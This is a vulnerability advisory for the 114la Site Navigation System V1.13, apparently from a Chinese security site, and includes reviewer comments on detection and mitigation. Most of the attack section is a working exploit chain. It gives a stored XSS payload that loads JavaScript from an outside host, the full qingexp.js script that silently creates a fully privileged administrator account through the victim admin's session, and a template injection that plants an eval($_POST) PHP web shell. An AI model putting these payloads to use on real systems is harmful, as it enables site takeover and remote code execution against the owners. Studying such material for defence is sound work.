114la Site Navigation System V1.13 XSS (cross-site scripting) vulnerability - vulnerability warning - the black bar safety net

2010-07-01T00:00:00
ID MYHACK58:62201027451
Type myhack58
Reporter 佚名
Modified 2010-07-01T00:00:00

Description

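Data submitted to url-submit/index.php is written to the database without any filtering, resulting in a stored XSS vulnerability. Because the stored value is later rendered in the administrator's review view, the fix belongs in two places: validate the field on submission and HTML-encode it wherever it is output.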

Test method: in the Site Name field, enter <script src=http://www. hackqing. cn/qingexp. js></script> (src is the address of your own js file, which must actually exist), fill in the other fields so that they meet the requirements, then submit. When the administrator reviews the submitted site, the js file is executed in the administrator's browser, inside the administrator's logged-in session. The js file used here adds an administrator account; in practice this can lead directly to a shell (see below).

qingexp.js

// Reviewer notes on the listing below. Extraction collapsed it onto two lines;
// it is kept exactly as published, including the stray spaces after dots and
// the doubled `siteurlsiteurl`, which look like extraction artifacts.
//
// What the script does once it runs in the reviewing administrator's browser:
//   1. Derives a base URL from document.URL with a regex replace.
//   2. Obtains an XMLHttpRequest object, falling back to a list of
//      ActiveXObject ProgIDs on older Internet Explorer.
//   3. Sends a synchronous GET to index.php?c=member and searches the response
//      text for the chosen user name.
//   4. If the name is absent, POSTs to c=member&a=member_add (name, password,
//      step=2), then POSTs to c=member&a=member_edit with every auth[...]
//      field set to 1 for that name.
//
// Why it succeeds: the requests are same-origin and ride the administrator's
// existing session. The bodies shown carry only name/password/step/auth
// fields, with no anti-CSRF token and no current-password confirmation, so
// presumably the two endpoints require neither (confirm against the
// application).
//
// Detection: the action names are in the query string, so access logs show a
// GET for c=member followed at once by POSTs to a=member_add and
// a=member_edit from an administrator's client; the member list then contains
// an account nobody created deliberately.
// Mitigation: HTML-encode the site name wherever it is rendered, validate it
// on submission, and require a per-session token (ideally re-authentication
// as well) on member_add and member_edit.
//Add an administrator account var siteurl = document. URL; siteurlsiteurl = siteurl. replace(/(.\/) {0,}([^\.]+)./ ig,"$1"); var username="qing";//username var password="qing520";//password var request = false; if(window. XMLHttpRequest) { request = new XMLHttpRequest(); if(request. overrideMimeType) { request. overrideMimeType('text/xml'); } } else if(window. ActiveXObject) { var versions = ['Microsoft. XMLHTTP', 'MSXML. XMLHTTP', 'Microsoft. XMLHTTP', 'Msxml2. XMLHTTP. 7. 0','Msxml2. XMLHTTP. 6. 0','Msxml2. XMLHTTP. 5. 0', 'Msxml2. XMLHTTP. 4. 0', 'MSXML2. XMLHTTP. 3. 0', 'MSXML2. XMLHTTP']; for(var i=0; i<versions. length; i++) { try { request = new ActiveXObject(versions[i]); } catch(e) {} } } var xmlhttp=request; xmlhttp. open("GET",siteurl+"/index. php? c=member", false); xmlhttp. setRequestHeader("Referer", siteurl); xmlhttp. setRequestHeader("Content-Type","application/x-www-form-urlencoded"); xmlhttp. send(); if (xmlhttp. responseText. indexOf(username)<0) { xmlhttp. open("POST", siteurl + "/index. php? c=member&a=member_add", false); xmlhttp. setRequestHeader("Referer", siteurl); xmlhttp. setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); xmlhttp. send("name=" + username + "&password=" + password + "&step=2"); xmlhttp. open("POST", siteurl + "/index. php? c=member&a=member_edit", false); xmlhttp. setRequestHeader("Referer", siteurl); xmlhttp. setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); xmlhttp. 
send("auth%5Bmember114laurl_add114lafeedback%5D=1&auth%5Bconfig114la%5D=1&auth%5Bfamous_nav114lafamous_loop_playfamous_nav_tab114laindex_site114laindex_tool114lamztopl114larecycler%5D=1&auth%5Bzhuanti114lazhuanti_class%5D=1&auth%5Badvise_index114lakey%5D=1&auth%5Bbackup114larestore114larepair114laclear114lamysites%5D=1&auth%5Btemplate_manage%5D=1&auth%5Bmake_html114la%5D=1&auth%5Bheader114lamenu114lawelcome114laframe114lalogin%5D=1&auth%5Bsecurity114la%5D=1&auth%5Bsite_manage%5D=1&auth%5Bplan% 5D=1&auth%5Bclass%5D=1&auth%5Blog%5D=1&step=2&name=" + username); }

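Data management->application included section->insert<{php}>@eval($_POST['a']);< {/php}> -> shell:url-submit/index.php Note: the site uses the Smarty template engine, and Smarty supports embedding PHP code in templates, which is what makes this step possible; it appears the author was not fully familiar with the third-party library. This is a second, separate weakness: content editable from the admin panel is compiled as template source with PHP tags enabled, so any admin-level access becomes code execution on the server. Disabling PHP tags in the template engine and not treating editable content as template source removes this step.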

Affected versions: V1.13. Official address: www.114la.com/114la